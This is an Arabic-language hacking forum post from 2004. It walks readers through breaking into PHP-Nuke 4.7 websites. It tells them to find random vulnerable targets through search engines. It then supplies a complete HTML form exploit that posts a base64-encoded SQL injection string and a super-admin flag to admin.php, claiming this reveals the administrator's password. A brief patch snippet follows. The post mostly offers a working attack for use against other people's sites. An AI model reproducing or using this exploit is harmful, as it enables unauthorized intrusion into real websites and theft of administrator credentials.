بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كما عودتكم لازم موضوع جديد
الحمد لله خذينا الموضوع هذا من احد مواقع السكرتي الأجنبية وترجمناه ووسهلنا عليكم الاختراق هذي ثغرة في اصدار النيوك 4.7
نبدا الشرح
اولا نروح احد محركات البحث
www.google.com
www.yahoo.com
www.av.com
ونكتب فية للبحث العشوائي للي ما عندة موقع يخترقة
php nuke 4.7
وبعيدن تطلع النتايج عاد عد كم موقع تقدر تخترقة بس مو كلهم ممكن بعضهم سادين الثغرة بس نجرب يا سلام شلون نخترقهم انا اقول لكم
اعمل صفحة html باي طريقية عن طريق الفرونت بيج عن طريق موقع عن طريق الكاتب اي شي المهم تسوي صفحة تكون فيها الاوامر هذي
كود:
<form name="mantra" method="POST"
action="http://www.sitewithphpnuke.com/admin.php">
<p>TITLE:
<input type="********" name="add_title">
<br>
CONTENT:
<********area name="add_content" rows=10 cols=50></********area>
<br>
DATE:
<input type="********" name="add_mdate">
<br>
E-MAIL:
<input type="********" name="add_expire">
<br>
<input type="hidden" name="add_expire" value="0">
<br>
<input type="hidden" name="add_active" value="1">
<br>
<input type="hidden" name="add_view" value="1">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="addmsg">
</p>
<p>
<input type="submit" name="Submit" value="Post this message">
<br>
</p>
</form>
الحين سجل الملف وافتحة وراح تحصل الباسورد حق مدير الموقع يلا عاد العب في الموقع لعب
===============================
سد الثغرة الاهم
ضعه في ملف admin.php
كود:
Apply this code to your admin.php file:
if ( !empty($HTTP_GET_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}
if ( !empty($HTTP_POST_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}
تحياتي
goldskull
الجمجمة الذهبية
ترقبوا كل جديد منا ان شاء الله
22-11-2004, 10:28 AM
العرض الشجري